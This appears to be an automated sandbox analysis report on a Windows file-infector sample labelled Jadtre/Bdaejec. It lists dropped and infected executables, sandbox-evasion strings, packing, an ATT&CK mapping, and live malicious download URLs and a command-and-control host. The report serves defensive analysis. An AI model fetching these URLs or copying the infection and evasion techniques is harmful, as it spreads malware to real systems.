Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

File written: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 5vrRrFN56j.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 5vrRrFN56j.exe

Static file information: File size 5541376 > 1048576

Source: 5vrRrFN56j.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1e3800
Source: 5vrRrFN56j.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x32f400

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Unpacked PE file: 1.2.WIJSmB.exe.4a0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Yara detected aPLib compressed binary

Source: Yara match	File source: 5vrRrFN56j.exe, type: SAMPLE
Source: Yara match	File source: 0.0.5vrRrFN56j.exe.6e8260.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.5vrRrFN56j.exe.71e03c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5vrRrFN56j.exe.71e03c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5vrRrFN56j.exe.6e8260.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.5vrRrFN56j.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5vrRrFN56j.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5vrRrFN56j.exe PID: 1896, type: MEMORYSTR

Source: initial sample

Static PE information: section where entry point is pointing to: B5xBu

Source: 5vrRrFN56j.exe	Static PE information: section name: B5xBu
Source: WIJSmB.exe.0.dr	Static PE information: section name: .aspack
Source: WIJSmB.exe.0.dr	Static PE information: section name: .adata
Source: SciTE.exe.1.dr	Static PE information: section name: u
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A6076 push 004A14E1h; ret	1_2_004A6425
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A1638 push dword ptr [004A3084h]; ret	1_2_004A170E
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A600A push ebp; ret	1_2_004A600D
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A2D9B push ecx; ret	1_2_004A2DAB

Source: 5vrRrFN56j.exe	Static PE information: section name: B5xBu entropy: 6.934706374303615
Source: WIJSmB.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934658382910195
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934502632515406
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.93338154164574

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe	File created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	File created: C:\Users\user\Desktop\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49705 -> 799

Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1038

Source: C:\Users\user\Desktop\5vrRrFN56j.exe TID: 4324

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 004A1754h

1_2_004A1718

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_004A29E2

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_004A2B8C

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 5vrRrFN56j.exe, 00000000.00000003.2149925413.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, 5vrRrFN56j.exe, 00000000.00000002.2152140130.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, 5vrRrFN56j.exe, 00000000.00000002.2151893976.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(=
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

API call chain: ExitProcess graph end node

graph_1-1012

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

Code function: 0_2_009A9044 mov eax, dword ptr fs:[00000030h]

0_2_009A9044

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_004A1718

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_004A139F

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: WIJSmB.exe PID: 6768, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: WIJSmB.exe PID: 6768, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	5 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
5vrRrFN56j.exe	95%	ReversingLabs	Win32.Virus.Jadtre
5vrRrFN56j.exe	100%	Avira	W32/Jadtre.B
5vrRrFN56j.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\WIJSmB.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\WIJSmB.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\update.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WIJSmB.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah
C:\Users\user\Desktop\update.exe	50%	ReversingLabs

Source	Detection	Scanner	Label
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://www.eyuyan.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.raryF	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarD	100%	Avira URL Cloud	malware
http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar?p	100%	Avira URL Cloud	malware
http://47.92.98.180:88/MQNT/data.txt	0%	Avira URL Cloud	safe
https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat	100%	Avira URL Cloud	malware
http://www.ip138.comUser-Agent:	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarQ	100%	Avira URL Cloud	malware
http://47.92.98.180:88/MQNT/GX_RZ.txt	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarD	100%	Avira URL Cloud	malware
https://www.uc.cn/ip	0%	Avira URL Cloud	safe
http://www.eyuyan.comservice	0%	Avira URL Cloud	safe
http://47.92.98.180:88/MQNT/MQNT.exe	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false	high
